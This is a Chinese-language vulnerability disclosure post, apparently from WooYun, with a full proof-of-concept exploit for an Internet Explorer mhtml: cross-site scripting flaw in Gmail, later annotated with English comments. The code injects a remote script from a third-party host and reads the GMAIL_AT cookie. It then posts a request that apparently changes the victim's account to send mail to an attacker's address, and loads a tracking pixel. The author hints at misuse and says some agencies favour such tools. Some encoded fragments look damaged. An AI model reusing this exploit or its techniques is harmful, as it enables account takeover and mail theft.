2011-04-29: 积极联系厂商并且等待厂商认领中，细节不对外公开
2011-04-29: 厂商已经主动忽略漏洞，细节向公众公开
还是跟 mhtml 有关，详细请看下面咯。
已经补掉了……现在放出来给大家分享下完整的 POC！
<script language="javascript">
// Picks one of two mhtml: URLs according to the Windows version reported by the browser and
// navigates the page to it. Both URLs point at mail.google.com/support/bin/answer.py and carry,
// in a second `answer=` parameter, a block of MIME headers (Content-Location,
// Content-Transfer-Encoding: base64) followed by a base64 body; that body decodes to the
// <script src=http://www.jacks.com/jack.js> tag quoted further down this page.
// The two variants differ only in how the line breaks are percent-encoded: `%250A`/`%250D`
// (double-encoded) for the NT 5.x branch, single `%0A`/`%0a` for the NT 6.x branch. The
// `%250D250D` and `base640L0D` fragments look like transcription damage in this copy of the
// post — TODO confirm against the original write-up.
// Defensive reading: the navigator.platform / userAgent checks are client-side and trivially
// spoofed; they only choose the encoding. The dangerous step is the navigation itself, which is
// observable on the client as a top-level navigation to an `mhtml:` scheme URL.
// Always returns the literal "other"; the call site below discards the value.
function detectOS() {
  var sUserAgent = navigator.userAgent;
  var isWin = (navigator.platform == "Win32") || (navigator.platform == "Windows");
  if (isWin) {
    var isWin2K = sUserAgent.indexOf("Windows NT 5.0") > -1 || sUserAgent.indexOf("Windows 2000") > -1;
    var isWinXP = sUserAgent.indexOf("Windows NT 5.1") > -1 || sUserAgent.indexOf("Windows XP") > -1;
    var isWin2003 = sUserAgent.indexOf("Windows NT 5.2") > -1 || sUserAgent.indexOf("Windows 2003") > -1;
    // Windows 2000 / XP / 2003: double-percent-encoded line breaks.
    if (isWin2K || isWinXP ||isWin2003) document.location="mhtml:https://mail.google.com/support/bin/answer.py?answer=6576&cbid=-1vw2scem46j8f&src=cb&lev= index&answer=%250AContent-Location:viki%250aContent-Transfer-Encoding:base64%250D250DPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5qYWNrcy5jb20vamFjay5qcz48L3NjcmlwdD4=!viki";
    var isWinVista = sUserAgent.indexOf("Windows NT 6.0") > -1 || sUserAgent.indexOf("Windows Vista") > -1;
    var isWin7 = sUserAgent.indexOf("Windows NT 6.1") > -1 || sUserAgent.indexOf("Windows 7") > -1;
    // Windows Vista / 7: single-encoded line breaks.
    if (isWin7 || isWinVista ) document.location="mhtml:https://mail.google.com/support/bin/answer.py?answer=6576&cbid=-1vw2scem46j8f&src=cb&lev= index&answer=%0AContent-Location:viki%0aContent-Transfer-Encoding:base640L0DPHNjcmlwdCBzcmM9aHR0cDovL3d3dy5qYWNrcy5jb20vamFjay5qcz48L3NjcmlwdD4=!viki";
  }
  return "other";
}
detectOS();
</script>
Content-Transfer-Encoding: 后面的内容需要 base64 编码，用来调用一个 js。
<!-- Decoded form of the base64 body embedded in both mhtml: URLs above
     (PHNjcmlwdCBzcmM9… is exactly this tag). The src is an unquoted plaintext http:// URL on a
     third-party host, so whatever that host serves at load time runs with the privileges of the
     page this tag ends up in — per the post, the mail.google.com origin. -->
<script src=http://www.jacks.com/jack.js></script>
JS代码如下:
// Runs inside the mail.google.com origin (delivered through the mhtml: URL above, per this post).
// document.write() drops a hidden iframe on /mail/x/ whose onload fires crosscookie(), plus a
// zero-width image from spypig.com — a third-party tracking pixel, presumably so the author is
// notified (with the victim's IP/UA) whenever the payload executes; confirm.
document.write('<iframe id=ifr width=0 height=0 onload="crosscookie()" src="http://mail.google.com/mail/x/"></iframe><img src="http://www.spypig.com/67fcfa37-4240-11e0-8986-00188be7649a/pig.gif" width=0>');

// Reads the GMAIL_AT token out of the frame's cookies, recovers the `ik` value from the inbox
// HTML, and sends one authenticated POST to the `view=mdlg` endpoint carrying MAIL.
// What mdlg / mdrp / mda mean is not stated on this page (the author only says the reader can
// guess); the parameter name `mda` suggests an address-related account setting — confirm.
// Side effects: two synchronous requests to mail.google.com with the victim's cookies, then a
// top-level navigation away. The closing brace of this function was swallowed into the trailing
// `//window.close();` comment when the post was flattened onto one line; it is restored below.
function crosscookie(){
  var KEY = 'GMAIL_AT';
  var MAIL = '[email protected]' // the address is redacted in this copy of the post
  // `ifr` is the implicit global the browser creates from the iframe's id= attribute; it is
  // replaced here by the frame's window, falling back to contentDocument.
  ifr = ifr.contentWindow ? ifr.contentWindow : ifr.contentDocument;
  // document.cookie of the frame is readable only because this script is same-origin with it;
  // any cookie exposed to script this way is exposed to every XSS in that origin.
  var cookies = ifr.document.cookie.split(/\s*;\s*/);
  var GMAIL_AT;
  var IK;
  for(var i = 0, len = cookies.length; i < len; i++){
    var arr = cookies[i].split(/\s*=\s*/);
    if(arr[0] == KEY) { GMAIL_AT = arr[1]; }
  }
  // IE-only: ActiveX XHR taken from the frame's window, used synchronously (third argument false).
  var xhr = new ifr.ActiveXObject('Microsoft.XMLHttp');
  xhr.open('GET', 'https://mail.google.com/mail/', false);
  xhr.send();
  var source = xhr.responseText;
  // Find `GLOBALS=[` in the inbox HTML; `(result + '')` string-coerces the match array so its
  // length is that of the matched text. `result` is assumed non-null — a missing marker throws here.
  var reg = /GLOBALS=\[/;
  var result = reg.exec(source);
  var pos = result.index + (result + '').length;
  var len = source.length; // re-declares the loop's function-scoped `len`; harmless after the loop
  var l = 1;
  var start = pos;
  // Bracket-depth scan to the `]` that closes the GLOBALS array literal.
  while(pos < len){
    var c = source.charAt(pos);
    if(c === '[') { l++; } else if(c === ']'){ l--; }
    if(l === 0) break;
    pos++;
  }
  // eval() over server-returned content: executes whatever the GLOBALS literal contains. The
  // hard-coded index 9 is an assumption about the 2011 page layout, not something this code checks.
  IK = eval('[' + source.substring(start, pos) + ']')[9];
  // The anti-CSRF token is replayed as `at=`. Such a token defeats cross-origin forgery only;
  // same-origin script can read and reuse it, which is exactly what happens here.
  xhr.open('POST', 'https://mail.google.com/mail/?ui=2&ik=' + IK + '&view=mdlg&at=' + GMAIL_AT, false);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
  xhr.send('mdrp=1&mda=' + MAIL);
  // Navigates away to an image URL (www.xxxx.com is presumably a placeholder in this copy).
  document.location="http://www.xxxx.com/images/scan.jpg";
  //window.close();
}
能做什么就不用我多说了吧？
官方已经修复了，放出来，研究 mail xss 的人看吧！这类东西某些部门还是非常喜欢的！还是 mhtml 问题哈～
未能联系到厂商或者厂商积极拒绝
漏洞Rank:10 (WooYun评价)